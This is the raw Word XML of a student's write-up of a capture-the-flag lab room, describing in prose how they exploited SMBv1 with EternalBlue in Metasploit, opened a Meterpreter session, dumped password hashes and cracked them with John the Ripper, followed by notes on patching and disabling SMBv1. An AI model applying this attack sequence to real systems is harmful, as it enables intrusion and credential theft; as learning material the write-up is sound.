          <w:highlight w:val="none"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E6C9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i/>
          <w:iCs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i/>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="none"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r/>
    </w:p>
    <w:p w14:paraId="632F1D1E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1C6D2941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5.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3861" cy="30386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399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303860" cy="303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.93pt;height:23.93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 Exploitation process (what you did)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022648EB">
      <w:pPr>
        <w:pStyle w:val="914"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:pBdr/>
        <w:shd w:val="clear" w:color="ffffff" w:themeColor="background1" w:fill="ffffff" w:themeFill="background1"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia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I firstly scanned the machine for open ports and found three one was port 445 which is being exploited.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia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eastAsia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</w:p>
    <w:p w14:paraId="1C29F0AA">
      <w:pPr>
        <w:pStyle w:val="914"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:num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Then I looked for the exploit in Metasploit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 and selected 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eternalblue MS17-010</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="121212"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">,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.</w:t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</w:p>
    <w:p w14:paraId="0CB892B7">
      <w:pPr>
        <w:pStyle w:val="914"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:num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I then set the LHOST, RHOST  and payload for the target IP.</w:t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</w:p>
    <w:p w14:paraId="72105F52">
      <w:pPr>
        <w:pStyle w:val="914"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:num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I ran the exploit eternalblue.</w:t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</w:p>
    <w:p w14:paraId="6718B8EF">
      <w:pPr>
        <w:pStyle w:val="914"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:num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Then I upgraded the shell to meterpreter and set a session.</w:t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</w:p>
    <w:p w14:paraId="3A859CA2">
      <w:pPr>
        <w:pStyle w:val="914"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:num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I interacted with the previous session and listed all the processes running to find the process ID.</w:t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</w:p>
    <w:p w14:paraId="3B8303CC">
      <w:pPr>
        <w:pStyle w:val="914"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:num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Used whoami to find what system I have access to </w:t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</w:p>
    <w:p w14:paraId="1E43C53E">
      <w:pPr>
        <w:pStyle w:val="914"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:pBdr/>
        <w:shd w:val="clear" w:color="ffffff" w:themeColor="background1" w:fill="ffffff" w:themeFill="background1"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia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Finally got all the passwords on the system using hashdump.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia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eastAsia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</w:p>
    <w:p w14:paraId="4A5F3DFD">
      <w:pPr>
        <w:pStyle w:val="914"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:num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After finding the correct user I used password cracker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Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="242424"/>
          <w:spacing w:val="-6"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">John the Ripper to crack  the hash.</w:t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</w:p>
    <w:p w14:paraId="0F30E851">
      <w:pPr>
        <w:pStyle w:val="914"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:num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Afterwards I looked for the flags using the clues given</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi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.</w:t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</w:p>
    <w:p w14:paraId="2BC1D5DD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5E9AEB31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6.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3184" cy="28318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32551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283182" cy="283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.30pt;height:22.30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 Result / outcome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13CFEC19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eastAsia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I learnt how to use the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">EternalBlue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 exploit to gain access to a vulnerable machine, then escalate Privileges to use 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</w:rPr>
        <w:t xml:space="preserve">hashdump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</w:rPr>
        <w:t xml:space="preserve"> to extract password hashes, and then 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</w:rPr>
        <w:t xml:space="preserve">John the Ripper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</w:rPr>
        <w:t xml:space="preserve"> to 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</w:rPr>
        <w:t xml:space="preserve">crack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</w:rPr>
        <w:t xml:space="preserve"> them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.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia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eastAsia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</w:p>
    <w:p w14:paraId="208C2107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61576E7B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7.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5300" cy="3153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264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315299" cy="315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4.83pt;height:24.83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  Key concepts learned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309DE55E">
      <w:pPr>
        <w:pStyle w:val="8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Cs/>
          <w:i/>
        </w:rPr>
      </w:pPr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Technical Concepts</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:bCs/>
          <w:i/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:bCs/>
          <w:i/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A8BFDE2">
      <w:pPr>
        <w:pStyle w:val="91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Nmap Scanning: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 Maps networks to discover active devices and identify open ports, services, and operating systems.</w:t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 w14:paraId="71D030C3">
      <w:pPr>
        <w:pStyle w:val="91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Metasploit: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 A penetration testing framework used to identify vulnerabilities, develop and execute exploit code against remote targets, and validate defensive controls.</w:t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 w14:paraId="56D1ACDB">
      <w:pPr>
        <w:pStyle w:val="91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EternalBlue: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 An exploit that targets a critical vulnerability in Microsoft's legacy Server Message Block version 1 (SMBv1) network protocol.</w:t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 w14:paraId="59C755FD">
      <w:pPr>
        <w:pStyle w:val="91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Meterpreter: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 A powerful Metasploit payload used during exploitation. It is significantly better than a standard shell because it operates entirely in-memory, making it stealthier against antivirus software.</w:t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 w14:paraId="23D3C959">
      <w:pPr>
        <w:pStyle w:val="91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Setting up Hosts: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 Defining the network paths for an attack by configuring the LHOST (Local Host / your machine) and RHOSTS (Remote Hosts / the target machine).</w:t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 w14:paraId="31D61497">
      <w:pPr>
        <w:pStyle w:val="91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Creating Sessions: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 The process of generating a payload, setting up a listener to catch it, and executing it on the target to maintain access.</w:t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 w14:paraId="44F924AD">
      <w:pPr>
        <w:pStyle w:val="8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Credential Harvesting Concepts</w:t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 w14:paraId="53554C4C">
      <w:pPr>
        <w:pStyle w:val="91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Hashdump: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 The post-exploitation process of extracting password hashes and other credentials directly from a computer’s memory or security database.</w:t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 w14:paraId="710D7CCD">
      <w:pPr>
        <w:pStyle w:val="91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b/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">John the Ripper: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 An open-source password security auditing and recovery tool used to conduct offline brute-force or dictionary attacks against cryptographic hashes to reveal the plain-text password.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:bCs/>
          <w:i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 w14:paraId="64C861F2">
      <w:pPr>
        <w:pBdr/>
        <w:shd w:val="clear" w:color="ffffff" w:themeColor="background1" w:fill="ffffff" w:themeFill="background1"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="0" w:left="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs/>
          <w:i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/>
          <w:i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/>
          <w:i/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="none"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w14:paraId="0018C58A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3CAA80F3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8.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3387" cy="31338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6436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313386" cy="3133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.68pt;height:24.68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 What I found difficult</w:t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454009F9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eastAsia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This room was very difficult to do and took me hours to complete and I had a lot of help. I felt really out of my depth and will return in a couple of months and do the room again without help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. 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I found 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the meterpreter commands and the hashdumping</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">most confusing.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia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  <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs/>
          <w:i/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="none"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C5B737A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35DBCF35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9.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911" cy="36091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30656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60910" cy="360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8.42pt;height:28.4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 How could this be prevented? </w:t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5C756C59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eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs/>
          <w:i/>
          <w:color w:val="auto"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="none"/>
          <w:u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u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">Microsoft released a critical security patch (known as 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u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">MS17-010) in March 2017. This was before the exploit was leaked publicly.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  <w:t xml:space="preserve"> Older systems need to upgrade and install these patches to prevent being exploited. Also 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u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">since the vulnerability exists within the legacy SMBv1 protocol,it’s a good idea to disable SMBv1 entirely on all networks.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u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">Endpoint security and firewalls also reduce the chance that an exploit attempt succeeds or spreads, especially if one device is missing updates.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs/>
          <w:i/>
          <w:color w:val="auto"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="none"/>
          <w:u w:val="none"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs/>
          <w:i/>
          <w:color w:val="auto"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="none"/>
          <w:u w:val="none"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FE76A7F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eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u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color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u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auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="none"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CF9F6B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color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr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10.  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="34"/>
          <w:szCs w:val="3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325259</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-55845</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="190154" cy="244562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42222519" name=""/>
                      <wps:cNvSpPr/>
                      <wps:spPr bwMode="auto">
                        <a:xfrm rot="0" flipH="0" flipV="0">
                          <a:off x="0" y="0"/>
                          <a:ext cx="190153" cy="244561"/>
                        </a:xfrm>
                        <a:prstGeom prst="cloudCallout">
                          <a:avLst>
                            <a:gd name="adj1" fmla="val -20833"/>
                            <a:gd name="adj2" fmla="val 62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106" type="#_x0000_t106" style="position:absolute;z-index:18432;o:allowoverlap:true;o:allowincell:true;mso-position-horizontal-relative:text;margin-left:25.61pt;mso-position-horizontal:absolute;mso-position-vertical-relative:text;margin-top:-4.40pt;mso-position-vertical:absolute;width:14.97pt;height:19.26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  <w:t xml:space="preserve">   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="34"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">Reflection / Key Takeways</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p w14:paraId="70389CDC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eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs/>
          <w:i/>
          <w:color w:val="auto"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="none"/>
          <w:u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  <w:t xml:space="preserve">This room highlights the importance of security  and protecting systems properly, so you reduce the chances of a cyber attack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  <w:t xml:space="preserve">. On a personal level it shows that I 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  <w:t xml:space="preserve">need more practice and learn how to research properly when I'm stuck becaus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  <w:t xml:space="preserve">e I felt really out of my depth doing this room as it introduced me to concepts I had never heard of. In the future before doing a room I will do some background research before I begin to get familiar with the concepts in more complex rooms like this one.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  <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs/>
          <w:i/>
          <w:color w:val="auto"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="none"/>
          <w:u w:val="none"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs/>
          <w:i/>
          <w:color w:val="auto"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="none"/>
          <w:u w:val="none"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BEDB251">
      <w:pPr>
        <w:pBdr/>
        <w:shd w:val="clear" w:color="ffffff" w:themeColor="background1" w:fill="ffffff" w:themeFill="background1"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs/>
          <w:i/>
          <w:color w:val="auto"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:u w:val="none"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pP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  <w:t xml:space="preserve">This room has reiterated the importance of security by design, making sure apps and systems have adequate security built in from th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  <w:t xml:space="preserve">e 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</w:rPr>
        <w:t xml:space="preserve">beginning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  <w:t xml:space="preserve"> t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  <w:t xml:space="preserve">o lessen the chances of these types of attacks</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="none"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs/>
          <w:i/>
          <w:color w:val="auto"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:u w:val="none"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs/>
          <w:i/>
          <w:color w:val="auto"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:u w:val="none"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D880D67">
      <w:pPr>
        <w:pBdr/>
        <w:shd w:val="clear" w:color="ffffff" w:themeColor="background1" w:fill="ffffff" w:themeFill="background1"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="0" w:left="709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011EB5C6">
      <w:pPr>
        <w:pBdr/>
        <w:shd w:val="clear" w:color="ffffff" w:themeColor="background1" w:fill="ffffff" w:themeFill="background1"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="0" w:left="709"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3B1B524A">
      <w:pPr>
        <w:pBdr/>
        <w:shd w:val="clear" w:color="ffffff" w:themeColor="background1" w:fill="ffffff" w:themeFill="background1"/>
        <w:spacing/>
        <w:ind/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4AE9BC2F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 w14:paraId="36F9597A">
      <w:pPr>
        <w:pBdr/>
        <w:shd w:val="clear" w:color="ffffff" w:themeColor="background1" w:fill="ffffff" w:themeFill="background1"/>
        <w:spacing/>
        <w:ind/>
        <w:rPr>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="121212"/>
          <w:sz w:val="24"/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311FBD2">
    <w:pPr>
      <w:pStyle w:val="88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3F0A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A4B4BC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BE58DF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56F6D6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B15E3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0FA097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AD6A0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1"/>
    <w:basedOn w:val="910"/>
    <w:next w:val="910"/>
    <w:link w:val="8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2">
    <w:name w:val="Heading 2"/>
    <w:basedOn w:val="910"/>
    <w:next w:val="910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3">
    <w:name w:val="Heading 3"/>
    <w:basedOn w:val="910"/>
    <w:next w:val="910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4">
    <w:name w:val="Heading 4"/>
    <w:basedOn w:val="910"/>
    <w:next w:val="910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5">
    <w:name w:val="Heading 5"/>
    <w:basedOn w:val="910"/>
    <w:next w:val="910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10"/>
    <w:next w:val="910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10"/>
    <w:next w:val="910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10"/>
    <w:next w:val="910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10"/>
    <w:next w:val="910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 w:default="1">
    <w:name w:val="Default Paragraph Font"/>
    <w:uiPriority w:val="1"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing/>
      <w:ind/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="861">
    <w:name w:val="Heading 1 Char"/>
    <w:basedOn w:val="86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6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60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60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60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60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60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6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6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10"/>
    <w:next w:val="910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86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10"/>
    <w:next w:val="910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86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0"/>
    <w:next w:val="910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Intense Emphasis"/>
    <w:basedOn w:val="8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7">
    <w:name w:val="Intense Quote"/>
    <w:basedOn w:val="910"/>
    <w:next w:val="910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8">
    <w:name w:val="Intense Quote Char"/>
    <w:basedOn w:val="860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9">
    <w:name w:val="Intense Reference"/>
    <w:basedOn w:val="8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0">
    <w:name w:val="Subtle Emphasis"/>
    <w:basedOn w:val="8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60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860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8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8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10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860"/>
    <w:link w:val="885"/>
    <w:uiPriority w:val="99"/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing/>
      <w:ind/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="887">
    <w:name w:val="Footer"/>
    <w:basedOn w:val="910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860"/>
    <w:link w:val="887"/>
    <w:uiPriority w:val="99"/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing/>
      <w:ind/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="889">
    <w:name w:val="Caption"/>
    <w:basedOn w:val="910"/>
    <w:next w:val="9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0">
    <w:name w:val="footnote text"/>
    <w:basedOn w:val="910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basedOn w:val="86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foot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910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basedOn w:val="860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end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character" w:styleId="896">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="8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7">
    <w:name w:val="FollowedHyperlink"/>
    <w:basedOn w:val="8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899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900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901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902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903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904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905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906">
    <w:name w:val="toc 9"/>
    <w:basedOn w:val="910"/>
    <w:next w:val="910"/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing w:after="100"/>
      <w:ind w:left="1760"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="907">
    <w:name w:val="Placeholder Text"/>
    <w:basedOn w:val="860"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing/>
      <w:ind/>
    </w:pPr>
    <w:rPr>
      <w:color w:val="666666"/>
    </w:r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paragraph" w:styleId="910" w:default="1">
    <w:name w:val="Normal"/>
    <w:qFormat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No Spacing"/>
    <w:basedOn w:val="910"/>
    <w:uiPriority w:val="1"/>
    <w:qFormat/>
    <w:pPr>
      <w:pBdr/>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      <w:ind/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="914">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="91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2026-06-26T11:07:28Z</dcterms:modified>
</cp:coreProperties>
</file>